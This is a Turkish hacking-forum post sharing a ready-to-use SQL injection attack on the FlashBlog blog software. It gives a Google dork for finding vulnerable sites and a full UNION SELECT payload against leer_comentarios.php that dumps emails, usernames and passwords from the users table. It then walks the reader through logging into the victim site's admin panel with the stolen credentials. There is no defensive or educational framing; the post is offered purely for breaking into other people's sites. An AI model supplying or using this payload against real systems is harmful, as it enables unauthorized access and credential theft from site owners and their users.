FlashBlog açığıyla hack -

[JaRu|e]

S.a arkadaşlar bir açığı sizinle paylaşmak istedim FlashBlog açığı



Go0gle Dork: allinurl:flashblog.html



Site sonuna eklenecek kod: /php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x 203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*





ÖrNEğiN: Hedef sitemiz [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]      [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]





Açılan sayfa muhtemelen aşağıdaki şekilde olacaktır...







Böyle bi sayfayla karşılaşırsak kullanıcı adı:admin şifresi:admin olacaktır

şimdi admin paneline gidelim [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]      [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]



yani site sonuna admin yazyoruz alanları dolduruyoruz ve hacked



daha bu bölümde ilk konum hatam olduysa şimdiden affola seLametLe